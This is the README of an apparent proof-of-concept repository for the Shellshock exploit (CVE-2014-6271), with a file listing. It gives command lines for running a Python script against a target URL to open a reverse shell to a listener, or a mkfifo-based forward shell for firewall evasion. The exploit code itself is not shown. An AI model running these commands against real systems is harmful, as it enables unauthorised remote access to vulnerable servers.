CVE-2014-6271 Shellshock# CVE-2014-6271 Shellshock
A python3 script for the CVE-2014-6271 Shellshock exploit that creates a reverse shell or a pseudo interactive shell using mkfifo for firewall evasion
## Getting Started
### Executing program
* With python3
```
python3 shellshock.py -t http://exploitshellshock.blah -lhost 127.0.0.1 -lport 9001
```
* For forward shell firewall evasion
```
python3 shellshock.py -t http://exploitshellshock.blah -fs
```
## Help
For help menu:
```
python3 shellshock.py -h
```
## Disclaimer
All the code provided on this repository is for educational/research purposes only. Any actions and/or activities related to the material contained within this repository is solely your responsibility. The misuse of the code in this repository can result in criminal charges brought against the persons in question. Author will not be held responsible in the event any criminal charges be brought against any individuals misusing the code in this repository to break the law.
[4.0K] /data/pocs/536f4b1d3697550364c59ca97beb7aaea52304d4
├── [ 982] README.md
└── [3.9K] shellshock.py
0 directories, 2 files